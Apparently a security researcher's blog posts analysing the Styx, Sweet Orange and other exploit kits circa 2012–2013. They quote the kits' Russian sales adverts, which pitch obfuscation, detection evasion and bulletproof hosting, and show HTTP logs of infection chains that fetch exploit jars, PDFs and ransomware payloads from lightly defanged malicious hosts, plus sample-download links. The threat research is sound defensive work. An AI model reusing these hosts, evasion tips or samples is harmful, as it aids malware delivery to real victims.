• Работа с сабаккаунтами: привязывайте свои потоки трафика к различным сабаккаунтам, разделяйте файлы, следите за более качественным трафиком;
• Гибкая статистика: выборки из NoSQL-хранилища MongoDB по сабаккаунтам, браузерам, странам, ОС, времени;
• Два варианта работы: связка на вашем сервере либо на нашем.
• Инсталляционный пакет. Ставится на ваши серверы одним скриптом за две минуты.
• Динамическая генерация линков выдачи. Каждый линк, на который льется трафик, является уникальным.Таким образом нет возможности детектировать URL сигнатурно. Лишь домен.
• Поддержка загрузки файлов с удаленных хостов по времени. Можно загружать файлы для сабаккаунтов удаленно.
• Наличие гибкого API для всех типов операций: каждая операция, доступная через административный интерфейс, является командой и продублирована в API;
• Проверка IP / Доменов на наличие в блэк-листах через дружественный сервис GhostBusters;
• Тихая работа: подобно падающему с дерева цветку сакуры, связка работает тихо;
• Ну и конечно же, достойный пробив и обновления, за счет чего обеспечивается качество. Кроме того, мы открыты к замечаниям и предложениям.

Ответы на часто задаваемые вопросы:

Q: Что такое Styx Sploit Pack 2.0?

A: Это современная набор для стресс-тестирования браузеров на уязвимости, написанный нами с нуля и проверенный в боевых условиях на протяжении полутора лет.

Q: Чем это отличается от BH, Sweet Orange, Сакуры?

A: Наш продукт более профессионален тем, что мы сами писали сплойты, нам не нужны ребилды, у нас быстрые очистки, адекватная поддержка, система тикетов, и пакет "All inclusive", в который входит все: поддержка, чистки, настройки и консультации.

У нас нет понятия "ребилд под домен", "сколько стоит одна очистка" и "когда предвидится чистка", "ограничение по трафику". Один раз заплатив фиксированную сумму, вы получаете месяц стабильной работы, которая точно вас устроит.

Q: Что входит, какой набор сплойтов?

A: Java, PDF, Abobe Flash и их деривативы.

Q: Какой пробив, где я могу увидеть статистику?

A: Статистика сильно зависит от трафика. Это значит, что те, кто показывает статистику, обманывают новичков хотя бы тем, что в реальной жизни эта статистика будет в корне отличаться от показанной.

Мы не будем морочить голову статистикой и цифрами, которые вы все равно не увидите, зато скажем, что пробив выше, чем у любой из вышеперечисленных связок от одного до десяти процентов.

Q: Какое гарантированное время поддержки?

A: Поддержка осуществляется в двух режимах: система тикетов и рилтайм (jabber). На протяжении оплаченного месяца вы получите поддержку 24x7.

Q: Что я получу за эти деньги?

A: Вы получите сам продукт, установленный на ваш сервер, настройку его для работы с TDS, консультации и очистки (поддержку) на протяжении месяца. Нет необходимости "ребилда под домен", потому что наш продукт отлично работает без ребилда, нужно лишь прописать пути в настройках. Гарантированное время очистки - два часа с момента алерта. Таким образом, вы получите максимальную степень свободы: не нужно ждать кого-либо, чтобы сделать ребилд, продукт работает с любыми вашими доменами, а требования к серверу достаточно низки.

Этих аргументов достаточно, чтобы целиком и полностью оправдать стоимость продукта для частных пользователей. 

Q: Сколько стоит продукт? 

A: Ценовую политику за нас определила компания Trend Micro:

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-russian-underground-101.pdf - страница 22, первый пункт - Styx Sploit Pack. Мы не будем им противоречить, заметим лишь то, что данный ценник является финальным: у нас нет привязки к доменам, ограничения по трафику и мы обеспечиваем отличный результат и отстук. Ценник включает поддержку на протяжении месяца.

Если угодно - тест платный. Цените наше и ваше время. Два часа тестиорвания а нашем сервере обойдутся в $100.

Q: Продаете ли исходники пака?

A: Нет.

Q: Каковы требования к аппаратной части (серверу?)

A: Крайне минимальны и равны требованиям любого низконагруженного сервера. Нам достаточно 512Мб памяти, канала в 100МБит и одного ядра для комфортной работы. На север должна быть установлена соответствующая ОС. Мы не поддерживаем Windows и *BSD.

Q: Домены? Как следить за палевностью доменов?

A: Рекомендуем воспользоваться сервисом Ghost Busters и написать простейший скрипт и повесить его на крон с периодичностью в полчаса.

Q: TDS? С какими TDS работает связка?

A: С любыми адекватными TDS. Мы рекомендуем использовать Сутру.

Q: Сжаты ли сплойты?

A: Комплект сплойтов шифрован и обфусцирован от АВ.

Q: Падают ли браузеры?

A: Вероятность падения крайне низка и ей можно пренебречь (лишь в частных случаях на остальных ОС с отдельными версиями браузеров были замечены падения).

Q: Бьет ли Хром?

A: Нет.

Q: Предосталяется ли тест?

A: Да.

Q: Какие требования для того, чтобы мне предоставили тест?

A: Вы предоставляете сервер (желательно, абузоустойчивый) с установленной ОС Linux (желательно Debian), развернутой TDS (для фильтрации ненужного трафика: мобильные юзерагенты, Mac, Linux, Chrome) -- с рутовым доступом, у вас должен быть чистый ЕХЕ для загрузки (без детектов размером не более 4 мегабайт), домены.

Q: Что я получу на выходе теста?

A: Мы дадим вам полный URL (с домена), куда необходимо лить трафик. Двух часов вполне достаточно, чтобы увидеть пробив. Грузиться будет ваш ЕХЕ, вы сможете проверить отстуки. Понятно, что % пробива зависит от качества трафика, поэтому претензии не принимаются.

Q: На чем написан сплойт-пак?

A: Его пользовательская часть написана на PHP5, а вот на чем написана чистка, генерация, сам код сплоитов — абсолютно неважно для конечного потребителя.

Q: Какую БД вы используете для статистики?

A: Последнюю версию MongoDB.

Q: Все-таки каков пробив?

A: Вы сами можете увидеть, каков он, заказав тест на своем трафике. Мы не будем обманывать вас, указывая цифры в «35%» и / или «ровно на 2% выше, чем у блэкхола». Те, кто хоть раз пробовал сравнивать связки, знает, насколько это неблагодарное занятие: необходимо иметь идеально одинаковый трафик, серверы должны работать абсолютно идентично для двух сравниваемых связок и прочие параметры. На самом деле качество можно оценить одним реальным показателем: полить трафик в тестовом режиме; разумеется, это зависит от трафика и его чистоты.

Q: Чем вы тогда лучше? За что я плачу деньги?

A: Во-первых, пробивом. Во-вторых гибкой интегрируемой системой, которая легко вписывается в более сложную инфраструктуру: продукт является масштабируемым и интегрируемым, что уже неоднократно пригодилось некоторым ПП. Такая гибкость позволяет на одном сервере обрабатывать большее количество клиентов, чем тот же БХ за счет уменьшенного размера файлов и отсутствия шифров PHP-части. В-третьих, обновления, чистки и поддержка, которые уже включены в стоимость. Нет необходимости платить за «смену домена» и «чистку». Мы просто обновим пак на сервере. В-четвертых, новые сплойты всегда входят в эту связку первыми (после прохождения тестирования на всех ОС, браузерах и SP). Мы не ищем паблик-сплойты, мы исследуем сами и, в некоторых случаях, покупаем технологии. В общем - Perpetuum Mobile, хотя в нашем случае это Perfectum Mobile.

Q: Можно ли посмотреть скриншоты?

A: Разумеется. Они будут выданы вам по запросу.

------------------------------------------

Translated by google as
------------------------------------------

2012 and ends on the eve of Armageddon, we are pleased to say that our news is not all finished. We proudly present Styx Vulnerability Browser Stress Test Platform 2.0 - modern set of software to test vulnerabilities in browsers.

Our team of about three years to develop and test the product quality is not cause to doubt the most demanding users, as it is designed and tested by our own prodkutah in conjunction with the obfuscator.We spent enough time working in private mode for myself, but now you can enjoy all the advantages provided by Styx Sploit Pack 2.0:

• Updating via GIT with the master server for any detective sployty;
• No binding to domains: You can specify any number of domains without rebuild;
• There are no restrictions on traffic. Pour as much traffic as stand channels of your server and its hardware capacity;
• Speed. The product is able to handle as many connections as your MIPS processor.
• Working with sabakkauntami: tie their traffic flows to different sabakkauntam, share files, watch for more quality traffic;
• Flexible statistics: sample of MongoDB NoSQL-stores on sabakkauntam, browsers, country, operating system, time;
• Two variants of: the combination on your server or on ours.
• Package. Put on your servers one script in two minutes.
• Dynamic generation of links issue. Each link on which traffic flows is unikalnym.Takim way not possible to detect the URL of the signature. Only domain.
• Support for downloading files from a remote host over time. You can upload files to sabakkauntov remotely.
• Having a flexible API for all types of operations: each operation, which is available through the administrative interface, a command, and repeated in the API;
• Checking the IP / Domain to the presence of black-lists through friendly service GhostBusters;
• Quiet operation: like falling from a tree sakura flower, bunch is quiet;

And of course, worthy of trial and upgrade, thereby ensured quality. In addition, we are open to comments and suggestions.
Answers to frequently asked questions:

Q: What is the Styx Sploit Pack 2.0?A: This is a modern collection for stress testing the browser for vulnerabilities, written by us from scratch and tested in combat during the half year.

Q: How is this different from the BH, Sweet Orange, Sakura?
A: Our product is more professional so that we ourselves wrote sployty, we do not need rebuild, we have a quick clean, adequate support ticket system and the package "All inclusive", which includes all: support, cleaning, tuning and advice.


We have no concept of "rebuild a domain", "How much does one clean up" and "when the expected cleaning", "restriction of the traffic." Once paid a flat fee, you get a month of steady work that exactly suits you.


Q: What are, what set sployty?A: Java, PDF, Abobe Flash, and their derivatives.

Q: What is the breakdown, where can I see the statistics?A: Statistics is highly dependent on traffic. This means that those who have the statistics, cheat newbies at least that in real life, these statistics will be radically different from those shown.

We will not fooling statistics and numbers, which you still can not see, but let's say that the sample is higher than that of any of the above bundles of one to ten percent.Q: What is the guaranteed time support?
A: Support is provided in two modes: a system of tickets and riltaym (jabber). Throughout the month you get paid support 24x7.

Q: What do I get for this money?A: You will get the product installed on your server, configure it to work with TDS, counseling and treatment (support) for a month. No need to "rebuild a domain", because our product works fine without rebuild, just need to register the path in the settings. Guaranteed clean - two hours after the alert. That way you get the maximum degree of freedom: no need to wait for someone to make a rebuild, the product works with all your domains and server requirements are quite low.

These arguments are sufficient to fully justify the cost of the product to consumers.

Q: How is the product?A: The price policy for us to identify a Trend Micro:
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-russian-underground-101.pdf
- Page 22, first paragraph - Styx Sploit Pack. We will not contradict them, we merely note that this is the final price tag: We do not have domain-binding, restrictions on traffic and we provide a great result and otstuk. Price list includes support for a month.

If you like - the test fee. Appreciate our and your time. Two hours testiorvaniya and our server will cost $ 100.

Q: Selling a source pack?A: No.

Q: What are the hardware (server?)A: It is minimal and equal to the requirements of any nizkonagruzhennogo server. It is sufficient to 512MB of memory, 100Mb channel and one core for comfortable operation. To the north, must have the appropriate operating system. We do not support Windows and * BSD.
Q: Domains? How to monitor incriminating domain?
A: We recommend to use a service Ghost Busters and write a simple script and hang it on the crowns at intervals of half an hour.

Q: TDS? What a bunch of TDS works?A: With any adequate TDS. We recommend using the Sutra.
Q: Does Compressed sployty?
A: Set sployty encrypted and obfuscated by AB.
Q: Does falling browsers?
A: Drop is very low and can be neglected (only in special cases for other OS with some versions of browsers were seen falling).

Q: Does Beats Chrome?A: No.

Q: Do Predostalyaetsya test?A: Yes.

Q: What are the requirements to ensure that I was given a test?A: You provide the server (preferably bulletproof) with preinstalled Linux (preferably Debian), deployed TDS (to filter unwanted traffic: yuzeragenty Mobile, Mac, Linux, Chrome) - with root access, you should have a clean exe download (no detections of no more than 4 megabytes) domains.

Q: What do I get the output of the test?A: We will give you the full URL (with domain), where it is necessary to pour traffic. Two hours is enough to see the breakdown. The shipment will be your EXE, you can check otstuk. It is clear that% punching depends on the quality of traffic, so no claim.


Q: What is written sployty-pack?A: His username is written in PHP5, but on what is written cleaning, generation, sploitov code itself - is not important to the end user.

Q: What kind of database you use for statistics?A: The latest version of MongoDB.

Q: After all, what is the test?A: You are free to see what he is, ordering the test on your traffic. We will not cheat you, pointing to the figures in the "35%" and / or "exactly 2% higher than blekhola." Those who have ever tried to compare the bunch, knows how this thankless task: to have a perfectly uniform traffic, the servers must run absolutely identical for the two compared ligaments and other settings. In fact, one can estimate the quality of the real measure: to water traffic in the test mode, of course, it depends on the traffic and its purity.
Q: What is your best time? What am I paying the money?
A: First, punching. Secondly flexible integrable system, which easily fits into a complex infrastructure: the product is scalable and integrable, which has repeatedly come in handy some PP. This flexibility allows a single server to handle more customers than the same BS by reducing the file size and the lack of PHP-ciphers. Third, updates, cleaning and maintenance, which are already included in the price. No need to pay for a "change domain" and "clean." We just update the pack on the server. Fourth, the new sployty always part of this bunch were the first (post-test on all operating systems, browsers, and SP). We are not looking for Public-sployty, we examine ourselves and, in some cases, purchase of technology. In general - Perpetuum Mobile, although in this case Perfectum Mobile.

Q: Can I see screenshots?A: Of course. They will be issued to you on request.

------------------------------------------

Mongodb, git update... definitively uncommon.
There is a Screenshot in the EN version of the Faq, but i guess it's outdated so won't post it.

Styx Login Screen

Ok now let's cross the river. (note : the content type was badly interpreted by Fiddler for jar, pdf, flash )

CVE-2012-5076 - CVE-2012-4681 - CVE-2012-1723 - CVE-2012-0507 :

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/

200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/dgoidEykr.jar - b072a091103f852c63ec8447ec1ca76e
200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/dgoidEykr.jar
200 OK (text/html)

GET http://halfdozendesktop .asia/LAyMeF0XPEt15Rud02Ec30b5Fz0byfF0jgpg12kzD09rsS12cX20lxlK0VfRy0rLcO0QSMg0KNK416R800CLnV13FJe0fkD20pphj0B7ND0mCWi0K2d40VpUN0SKzh0tPuR0n7250hH8v03aNY0tO4Y0uBBE01ZOU07iTt04QK60kNXm0wjW80nir10Os9D16chh/getmyfile.exe?o=1&h=11
200 OK (application/octet-stream) ddeed364223103c98470574ca2415518 (see the end for explanation)

CVE-2012-5076 positive path on Styx Sploit Pack

Piece of the CVE-2012-5076 puzzle in the jar file of Styx SP

CVE-2012-0507 - Positive path on Styx Sploit Pack

CVE-2012-1723 - Positive path on Styx Sploit Pack

CVE-2012-1723 in jar file from Styx Sploit Pack

CVE-2012-4681 positive Path on Styx Sploit Pack

CVE-2008-0655 - CVE-2010-0188 :

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/

200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/pdfx.html - 0e2f1e874213671e1d13d5947184141f

200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/ztZasO.pdf -579f3a8d42759d40d905efe2303fadbf

200 OK (text/html)

GET http://halfdozendesktop .asia/8I0ap30UoLQ14Ezq0QDK90tGZL0CZ6H001xH0d21p0H57G0pZvE0UpPq14MBb0HMtd0uUB30NmHe02mLn0yePz13g2m0k4zN0CbL7186wa0bgfI0Gytb0DGVp169Rx01GBE06g55004gV093Y010JMI0Tv1I0JLVM0Na9C04PVU0ZwsO01ZMC0HRjS0FBgf08Xzc/getmyfile.exe?o=1&h=03

200 OK (application/octet-stream)

pdfx.html :

Small part of 579f3a8d42759d40d905efe2303fadbf - pdfx.html

After some deobfuscation we can get the PluginDetect ( http://pastebin.com/raw.php?i=v0nccWXF )

Insertion of the Pdf iframe via uaQzs

function uaQzs to write iframe

CVE-2008-0655 Positive path in Styx Sploit Pack (Adobe Reader 8.1.1 on IE9 Win7 x64)

CVE-2010-0188 Positive Path in Styx Sploit Pack (Adobe Reader 9.3 on IE8 Win7 x64)

Yes same path for both...and nothing in the image to prove AR version.

malicious js in the PDF of Styx Sploit Pack (I don't know for sure but I think this is CVE-2008-0655 related - any comment/mail welcome)

Embedded Tiff file to trigger the CVE-2010-0188

CVE-2012-4969 via JS heapspray (!!) :

Patch that i need to remove to get the positive Path (KB2744842 fixing MS12-063 - CVE-2012-4969)

CVE-2012-4969 Path on XP IE8 (no Java, no Flash, no Adobe Reader)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/

200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/pdfx.html

200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/flsh.html

200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/ie78xp.html

200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/anavg.js

200 OK (text/html)

GET http://halfdozendesktop .asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/KIIMRl.html

200 OK (text/html)

GET http://halfdozendesktop .asia/NkSk0i01dvd0SNEt0338S0MGBo16hQe0NPlB16hez0GHdP0rTVf0hbMy0xrnq0dsPt0khuT0olg60grjw0mkyo0rSbx0JTGC0BwGY02N7Z14e2B0eCSD0sw5K0LIGD0w3LL0yp8M02B0b0mZPQ1419i0ronX00wvd0sG1B0QE6c0vZGG0BSx40htRe0gaJL02JJG/getmyfile.exe?o=1&h=31

200 OK (application/octet-stream)

ie78xp.html :

ie78xp.html landing for CVE-2012-4969 on Styx Sploit Pack

After deobfuscation :  http://pastebin.com/raw.php?i=7HuapwGa

interessing parts of ie78xp.html In green the Shellcode

In what i read, CVE-2012-4969 was often associated to flash malicious file...in this case it seems it's triggered via JS heapspray. We recognize some part of code found in the "JavaScript Heap Exploitation library" :
http://retrogod.altervista.org/heapLib_js.html

Pylibemu on the ShellCode (hat tip again to Angelo and Markus for the hard work !)

Shellcode in the CVE-2012-4969 exploitation

Once again got trouble to trigger flash Exploits :
But here are the call :

GET http://halfdozendesktop
.asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/flsh.html
200 OK (text/html)

GET http://halfdozendesktop
.asia/NgHCXy0G6wJ0LMGk0O3RF09MIo17lkO0uoCO00rUA0Qqad0e4OZ0TbYW13XIS11PRb0BYOe06eQ9/Main.swf - 5aebdb45d1b232df1942ba39768ae934
200 OK (text/html)


Out of the scope of this Post. The payload ?  ddeed364223103c98470574ca2415518
Ransomware Chidol(have to find time to gather localized designed)

Chidol DE (12-2012)

C&C Call for DE Design
http://wouldstats .com/landing/template=2/KfepZmEFTDTs18iveCgKhoi2knXcr2knwMwQNMWhRqocNxSmTvMWu701b7pr_DRPqQ
http://wouldstats .com/landing/template=2/css/style_2.css   91.201.215.173

Files?
http://goo.gl/Y6Twj (public pass, zipped with 7z)

Read more ?

What you need to know about CVE-2012-4969 - 2012-09-21 - Daniel Chipiristeanu - Microsoft

Juice the Sweet Orange - 2012-12

December 27, 2012, 3:31 pm

≫ Next: 0 day 1.7u10 (CVE-2013-0422) spotted in the Wild - Disable Java Plugin NOW !

≪ Previous: Crossing the Styx ( Styx Sploit Pack 2.0 ) - Meet CVE-2012-4969 via JS heapspray

$

0

0

Sweet Orange landings have changed around the 15th of December from something like :

http://bigromeguide .com/wHOies?tMNdb=37

or

http://hwdcommunicating .pro/gsziXO?PDBbp=45

or

http://haztalansrayail.myftp .org:443/KsnEPR?coMgL=19

pushing a standard PE

to something like :

http://nutrientcenters  .biz/platz_login/login1/tools/credits.php?sitemap=601&computer=37&health=779&demo=37&edgybg=160

or

http://dimtarhafryz.sytes .net/movies/loginflat/admincp/test.php?time=25&ubuntu=343&watch=737&family=209&community=60&story=232

or

http://nutrientcenters .biz/otto/mobile/support/credits.php?soma=863&demo=37&incest=346&christmas=188&german=51&themes=150

pushing a Xored PE (via Java ) and normal PE via PDF

XORed PE

As i never made a "common EK's CVEs" flight over Sweet Orange (SWT), we'll take a look at that. First the text of the initial advert  (2012-02-20):

------------------------------------------

Связка Sweet Orange

Сервер

Основные возможности

1) Держит большие объёмы. Сервер полностью написан на языке си, веб сервер, пхп для его работы не требуются.

При разработе использовались технологии для высоконагруженных систем. Таким образом достигается высокая скорость обработки соединений.

2) Защита от DDOS атак и автоматического скачивания эксплоитов ав.

3) Удобство инсталляции и обновления.

4) Проверка доменов и IP-адресов по блек листам. На данный момент реализована проверка через scan4you. При запросе возможно добавить ваши сервисы.

5) На текущей версии пробив от 15%.

Веб-интерфейс

Установка веб-интерфейса практически полностью автоматизирована

Основные возможности

1) Управление сервером через веб-интерфейс.

2) Подробная статистика, возможность посмотреть статистику по каждому поставщику трафика. Возможность просмотра статистики по

пробиву для конкретного поставщика для неавторизованных пользователей.

3) Каждому поставщику трафика можно установить свой файл.

4) Удобный механизм обновлений.

5) Информация по вашим доменам и IP-адресам.

6) Подробная справка по использованию.

Поддержка

1) Регулярные чистки, в команде несколько криптовщиков. Саппорт постоянно онлайн.

2) Постоянно ведётся работа над новыми эксплоитами и улучшением старых.

Тарифы

Цена связки 2500 WMZ + первые 2 недели чисток и смены доменов бесплатно.

Дополнительные услуги

Чистка: 1 месяц 1000 WMZ

Смена доменов

1) Ограничение по количеству (цена указана за один домен)

до 10 - 25 WMZ

от 10 до 30 - 15 WMZ

от 30 - 10 WMZ

2) Ограничение по времени (в днях)

10 - 300 WMZ

20 - 400 WMZ

30 - 600 WMZ

Смена сервера 20 WMZ

Заинтересованы в постоянных клиентах и долговременном сотрудничестве.

Контакты

sweet_orange1@jabber.org

------------------------------------------

Translated by Google as:

------------------------------------------

Sweet Orange Pack

Server

Key features

1) Hold a large amount. The server is completely written in C, a web server, php for it to work is required.

Used when designing technology for heavy systems. Thus achieves high processing speed connections.

2) Protection from DDOS attacks and automatically download exploits AB.

3) Easy installation and upgrade.

4) Check the domain and IP-addresses to black list. At this point a check is implemented scan4you. When you request may add up the services.

5) The current version of the sample from 15%.

Web Interface

The Web interface to automate

Key features

1) Management of the server via a web interface.

2) Detailed statistics, the ability to see the statistics for each supplier of traffic. The ability to view statistics

Breaking for a particular vendor to unauthorized users.

3) Each supplier of traffic you can set your file.

4) Convenient updates.

5) Information on your domain and IP-addresses.

6) Detailed information on the use.

Support

1) Regular cleaning team several kriptovschikov. Sapport constantly online.

2) We are constantly working on new exploits and improving old ones.

Tariffs

Price pack 2500 WMZ + first 2 weeks of cleansing and change the domain for free.

Additional services

Cleaning: 1 month 1000 WMZ

Changing Domains

1) Limitations on the number (the price is for one domain)

10 - 25 WMZ

10 to 30 - 15 WMZ

from 30 - 10 WMZ

2) The time limit (in days)

10 - 300 WMZ

20 - 400 WMZ

30 - 600 WMZ

Changing the server 20 WMZ

Interested in regular customers and long-term cooperation.

Contacts

sweet_orange1@jabber.org

------------------------------------------

Login Screen

Sweet Orange Login Screen (2012-11-20)

One pass:

GET http://nutrientcenters .biz/otto/mobile/support/credits.php?soma=863&demo=37&incest=346&christmas=188&german=51&themes=150
200 OK (text/html)

One SWT landing (2012-12-26)

GET http://nutrientcenters .biz/otto/mobile/support/fliFiWJM
200 OK (application/pdf) 1a5367b21bb4f548798d7ac44cc079cd (wepawet win)

GET http://nutrientcenters .biz/otto/mobile/support/WTPsjof
200 OK (application/x-java-archive) 4e8971f7b70850a810aed3c6ff32b492

Nicely tagged by VirusTotal

GET http://nutrientcenters .biz/otto/mobile/support/MbBOA
200 OK (application/x-java-archive)  842b852ac19e87f27ca273046db6832a

GET http://nutrientals .org/webapp.php?space=403&oreilly=4&time=606&groupsn=171&watch=359&atom=518&crack=604&crime=209&meta=459&openparadise1=552
200 OK (application/octet-stream)

CVE-2012-5076 :

CVE-2012-5076 in Sweet Orange

Part of CVE-2012-5076 in WTPsjof.jar

CVE-2012-0507 :

CVE-2012-0507 Successful Path on SWT

CVE-2012-1723 :

CVE-2012-1723 Successful Path on SWT

CVE-2012-4681 :

CVE-2012-4681 Path on SWT

CVE-2011-3544 :

CVE-2011-3544 positive Path

XORing ?

XORing part of  MbBOA.jar spotted by Chris Wakelin

CVE-2010-0188 :

CVE-2010-0188 Path

fliFiWJM 200 OK (application/pdf) 1a5367b21bb4f548798d7ac44cc079cd (wepawet win)

Part of Wepawet Analysis

Part of Wepawet Analysis

Checked also but seems safe :

Mdac, CVE-2011-0611, CVE-2011-3402

Payload ?

44b1bf6f39bb13e08603a783559cf975 Citadel  - home was : http://enginewreck .biz/gate.php - 178.49.172.86

Files ?

Zip content

http://goo.gl/Np7mp (Zipped with 7z with public password)

More about Sweet Orange :

 [ru] Underground Forum Thread on Damage Lab- 2012-04-04 - Aels - Damage Lab

CVE-2012-5076 - Massively adopted - Blackhole update to 2.0.1 - 2012-11-17

CVE-2012-4681 - Связка Sweet Orange - 2012-08-30

References on Exploit Kits ?
Common Exploit Kits 2012 Poster - 2012-11-11 Mila - Contagio
Wild Wild West - 2012-23-10 - Kahu Security
An Overview of Exploit Packs (Update 17) October 12, 2012 - 2012-10-12 Mila - Contagio

0 day 1.7u10 (CVE-2013-0422) spotted in the Wild - Disable Java Plugin NOW !

January 10, 2013, 2:47 am

≫ Next: Meet "Red Dot exploit toolkit"

≪ Previous: Juice the Sweet Orange - 2012-12

$

0

0

Was wondering what to do with that...

Disclose, do not Disclose.

Hundreds of thousands of hits daily where i found it. This could be a cause mayhem.
I think it's better to make some noise about it.

Standard PE download via CVE-2013-0422 with jre1.7u10  - Firefox Windows XP

Standard PE download via CVE-2013-0422 with jre1.7u9  -  Internet Explorer 9 Windows 7x64

<edit1 10/01/13 14:24 GMT+1>
Reading this, Zero-Day Java Exploit Debuts in Crimeware by Brian Krebs
I think there is no reason anymore to try to hide anything. Let's Disclose.

Cool EK :

CBeplay.P Cool EK Landing 10/01/13

0 day in Cool EK Cbeplay.P Spain Landing

GET http://geurtdenhaupdad.bounceme .net/read/offer-canvas.jsp
200 OK (text/html)

GET http://geurtdenhaupdad.bounceme .net/read/UTTER-OFFEND.JAR
200 OK (application/java-archive)  ee4930874422c818267b44112ac8f29b

GET http://geurtdenhaupdad.bounceme .net/read/UTTER-OFFEND.exe
200 OK (application/x-msdownload)  237f8ffc0c24191c5bb7bd9099802ee4  CBeplay.P Ransomware - ES (out of scope)

The payload : CBeplay.P - Localized for Spain

With Another landing (dig for :  Reflect.Ditch.shtml ) : out of scope CBeplay.P UK 8f8e84c1d982c53a6a171c9be55097b9

The payload : CBeplay.P - Localized for UK

If you are interested by this Specific Threat (CBeplay.P), feel free to drop a mail.

0 day in Cool EK Reveton

GET http://50ee59e132505.painfree123 .com/news/COSTLY-PROCURE.PHTML
200 OK (text/html)

GET http://50ee59e132505.painfree123 .com/news/contempt.eot <- CVE-2011-3042 failed (IE9) attempt (duqu like font drop)
200 OK (text/html)

GET http://50ee59e132505.painfree123 .com/news/Edit.jar ee4930874422c818267b44112ac8f29b
200 OK (application/java-archive)

GET http://50ee59e132505.painfree123 .com/news/Edit.exe
200 OK (application/x-msdownload)  0623ce6af469c041c3908f5c64e2cad6 Reveton Ransomware (out of scope)
(More Reveton : d28964c1f895c8edcb613f8b2cb5d051 fdf12efe66d614bfb29c51897a104430 ec7ad2a9c4ccff2630fb00db435a8941 )

Reveton SE "Winter" Landing More information here

one more Java:
a3608c0086c93eec085f3f078c44fdf3

Useless video showing live infection (working referrer incl.)

Nuclear Pack :

Announcement for Nuclear Pack.

Redkit :

Redkit featuring what could be the same 0day

GET http://streamwoman .com/mfui.htm
200 OK (text/html)

GET http://streamwoman .com/miqt.htm
200 OK (text/html)

GET http://streamwoman .com/332.jar
404 Not Found (text/html)

GET http://streamwoman .com/887.jar
200 OK (application/java-archive) 7143829b81963bd7c3fad219b595ec4c

GET http://streamwoman .com/41.html
200 OK (application/octet-stream)


Blackhole :

Sinowal Blackhole featuring 0 day

GET http://wymxxnb.compress .to/adfasdfksjdfn/implying-specify-dropping-fundamental.php
200 OK (text/html)

GET http://wymxxnb.compress .to/adfasdfksjdfn/implying-specify-dropping-fundamental.php?cvwms=iyokjb&ssyoa=favubmb
200 OK (application/java-archive) 483b40f21a9e97f0dc6c88a21fddc1ec

GET http://wymxxnb.compress .to/adfasdfksjdfn/implying-specify-dropping-fundamental.php?uf=1j:1l:1o:1l:2v&xe=1f:30:1h:1o:1o:31:1o:1l:2v:1f&p=1f&yt=w&pu=o
200 OK (application/x-msdownload)

Another one :

CVE-2013-0422 in BH EK

GET http://014044130110225951863963ee92258948f1673f95d31ad.jtmtir .eu/sort.php
200 OK (text/html)

GET http://014044130110225951863963ee92258948f1673f95d31ad.jtmtir .eu/info/last/index.php
200 OK (text/html)

GET http://014044130110225951863963ee92258948f1673f95d31ad.jtmtir .eu/info/last/index.php?qtp=mux&aqdyg=knny
200 OK (application/java-archive) 483b40f21a9e97f0dc6c88a21fddc1ec

GET http://014044130110225951863963ee92258948f1673f95d31ad.jtmtir .eu/info/last/index.php?yf=2w:30:1i:31:33&oe=33:1g:2v:32:1o:1h:2v:32:1m:1h&h=1f&fz=p&kq=u
200 OK (application/x-msdownload) dfc4995203b8e7d87df6dfbae1d7774c - Leechole.A - Malwr.com analysis

GET http://014044130110225951863963ee92258948f1673f95d31ad.jtmtir .eu/exit.php?x=31&t=timeout
200 OK (text/html)

GET http://014044130110225951863963ee92258948f1673f95d31ad.jtmtir .eu/exit.php?go=3035
302 Found to http://www.maturepornxxxtube .com/?t=113244,1,206,0



Sakura :

Sakura CVE-2013-0422 Positive Path

GET http://fc70efc87b.tespena.lapy .pl:82/forum/index.php?showtopic=715530
200 OK (text/html)

GET http://fc70efc87b.tespena.lapy .pl:82/forum/dare.php?hsh=tr&key=671bf50c83d3346a782094d74b655140
200 OK (application/pdf)

GET http://fc70efc87b.tespena.lapy .pl:82/forum/dare.php?hsh=6&key=f3a6e4200aeea550e9bbb090ffc13e12
200 OK (application/x-java-archive) 253c57c3f5e2abb23861134a343a7308

